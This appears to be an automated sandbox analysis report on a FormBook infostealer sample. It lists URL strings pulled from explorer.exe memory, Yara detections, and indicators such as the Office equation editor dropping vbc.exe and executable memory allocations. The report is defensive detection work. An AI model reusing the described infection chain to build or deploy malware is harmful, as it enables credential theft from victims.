          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2172365601.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2172040341.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000008.00000000.2162967936.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe
Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe, Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe, Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe, Code function: 7_2_004181D0 NtCreateFile,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_00418280 NtReadFile,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_00418300 NtClose,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_004183B0 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_00418222 NtCreateFile,
